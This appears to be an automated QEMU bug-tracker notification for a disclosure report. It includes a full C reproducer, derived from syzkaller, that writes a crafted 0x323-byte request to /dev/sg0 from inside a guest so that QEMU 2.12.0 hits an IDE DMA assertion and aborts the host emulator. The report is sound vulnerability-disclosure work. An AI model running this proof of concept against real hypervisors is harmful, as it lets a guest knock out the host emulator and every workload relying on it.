This is an automated cleanup. This bug report has been moved to QEMU's new bug tracker on gitlab.com and thus gets marked as 'expired' now. Please continue with the discussion here:
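https://gitlab.com/qemu-project/qemu/-/issues/57
** Changed in: qemu Status: In Progress => Expired
** Changed in: qemu Assignee: John Snow (jnsnow) => (unassigned)
** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57 https://gitlab.com/qemu-project/qemu/-/issues/57
-- You received this bug notification because you are a member of qemu-devel-ml, which is subscribed to QEMU. https://bugs.launchpad.net/bugs/1777315
Title: IDE short PRDT abort
Status in QEMU: Expired
Bug description: Hi, QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0. Run the program below inside a qemu-2.12.0 guest:

/*
 * Reproducer for the QEMU IDE "short PRDT" assertion failure
 * (hw/ide/core.c, ide_dma_cb: `n * 512 == s->sg.size`), generated by
 * syzkaller and lightly cleaned up.
 *
 * Run it INSIDE the guest, as a user that can open /dev/sg0 (normally
 * root). It issues one 0x323-byte write(2) to the first SCSI-generic
 * device; on an affected QEMU (2.12.0 reported) the host-side
 * qemu-system-x86_64 process hits the assertion and aborts, i.e. a
 * guest-triggered denial of service against the emulator. The request
 * length is not a multiple of 512, which is presumably what the "short
 * PRDT" in the title refers to -- the exact guest-kernel path from the sg
 * write to the IDE DMA callback is not shown here, so treat that as a
 * hypothesis to confirm against the kernel's sg driver.
 *
 * Changes from the raw syzkaller output: the fixed-address mmap, open,
 * dup2 and write results are checked and reported, so "does not
 * reproduce" can be told apart from "could not open /dev/sg0" or "the
 * scratch mapping failed and the process segfaulted"; the mmap flags use
 * the named constants instead of raw numbers; the request buffer is
 * zeroed explicitly instead of relying on the fresh anonymous mapping.
 */
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Fixed scratch mapping the generated program uses for every buffer. */
#define SCRATCH_ADDR 0x20000000UL
#define SCRATCH_LEN  0x1000000UL

/* Offsets inside the scratch mapping, kept from the original reproducer. */
#define REQ_OFF      0xec0   /* start of the buffer handed to write(2) */
#define REQ_LEN      0x323   /* bytes written; not a multiple of 512 */
#define PAYLOAD_OFF  0x20    /* where the 12 non-zero bytes sit in the request */

/* The only non-zero bytes of the request, verbatim from the syzkaller output. */
static const uint8_t payload[12] = {
    0x9c, 0x4d, 0xe7, 0xd5, 0x0a, 0x62, 0x43, 0xa7, 0x77, 0x53, 0x67, 0xb3
};

/*
 * syzkaller's open-device helper.
 *   a0 == 0xc / 0xb : open /dev/char/<a1>:<a2> or /dev/block/<a1>:<a2>
 *                     read-write.
 *   otherwise       : a0 is a NUL-terminated path template; every '#' is
 *                     replaced by a decimal digit of a1 (least significant
 *                     first) and the file is opened with flags a2.
 * Returns the fd, or -1 with errno set by open(2).
 */
static int syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
    char path[1024];

    if (a0 == 0xc || a0 == 0xb) {
        /* Bounded formatting; the original used sprintf into a 128-byte buffer. */
        snprintf(path, sizeof path, "/dev/%s/%d:%d",
                 a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
        return open(path, O_RDWR, 0);
    }

    /* Template form: bounded copy (always NUL-terminated), then fill each
     * '#' with the next digit of a1. */
    snprintf(path, sizeof path, "%s", (const char *)a0);
    for (char *hash = strchr(path, '#'); hash; hash = strchr(hash + 1, '#')) {
        *hash = (char)('0' + a1 % 10);
        a1 /= 10;
    }
    return open(path, (int)a2, 0);
}

/*
 * Issue the crashing request.
 * Returns 0 if the write was submitted to the sg device (on an affected
 * QEMU the host-side emulator is expected to abort at that point), or 1 if
 * a preliminary step failed; the failing step is reported on stderr.
 */
static int loop(void)
{
    uint8_t *scratch = (uint8_t *)SCRATCH_ADDR;
    uint8_t *req = scratch + REQ_OFF;

    /* "/dev/sg#" with a1 == 0 expands to "/dev/sg0"; opened O_RDWR (the
     * generated program passed the raw value 2). */
    memcpy(scratch, "/dev/sg#", 9);
    int fd = syz_open_dev((uintptr_t)scratch, 0, O_RDWR);
    if (fd == -1) {
        perror("open /dev/sg0");
        return 1;
    }

    /* dup2(fd, fd) is kept from the generated program; it returns fd
     * unchanged and only fails if fd is invalid. */
    int wfd = (int)syscall(__NR_dup2, fd, fd);
    if (wfd == -1) {
        perror("dup2");
        return 1;
    }

    /* Request: all zero except the 12 payload bytes at PAYLOAD_OFF. The
     * original zeroed a few header bytes explicitly and relied on the
     * freshly mapped anonymous memory for the rest; memset makes that
     * explicit and independent of the mapping's history. */
    memset(req, 0, REQ_LEN);
    memcpy(req + PAYLOAD_OFF, payload, sizeof payload);

    ssize_t n = syscall(__NR_write, wfd, req, (size_t)REQ_LEN);
    if (n == -1) {
        /* The guest kernel rejected the request before it reached the device. */
        perror("write /dev/sg0");
        return 1;
    }
    printf("write of %d bytes submitted (returned %zd)\n", REQ_LEN, n);
    return 0;
}

int main(void)
{
    /* The generated program used the raw values 3 (PROT_READ|PROT_WRITE)
     * and 0x32 (MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED on x86-64). Without the
     * result check, a failed mapping turns every later store into a SIGSEGV
     * inside the guest and masks the real outcome. */
    void *map = (void *)syscall(__NR_mmap, SCRATCH_ADDR, SCRATCH_LEN,
                                PROT_READ | PROT_WRITE,
                                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                                -1, 0);
    if (map != (void *)SCRATCH_ADDR) {
        perror("mmap scratch region");
        return EXIT_FAILURE;
    }
    return loop() ? EXIT_FAILURE : EXIT_SUCCESS;
}

this will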
crash qemu, output information:

    qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.

(An assertion failure aborts the whole qemu-system-x86_64 process, so the guest takes the emulator down with it. Note that the description above cites hw/ide/core.c:871 while the assertion output names line 843; the two presumably come from different source revisions.)

Thanks owl337

To manage notifications about this bug go to: https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
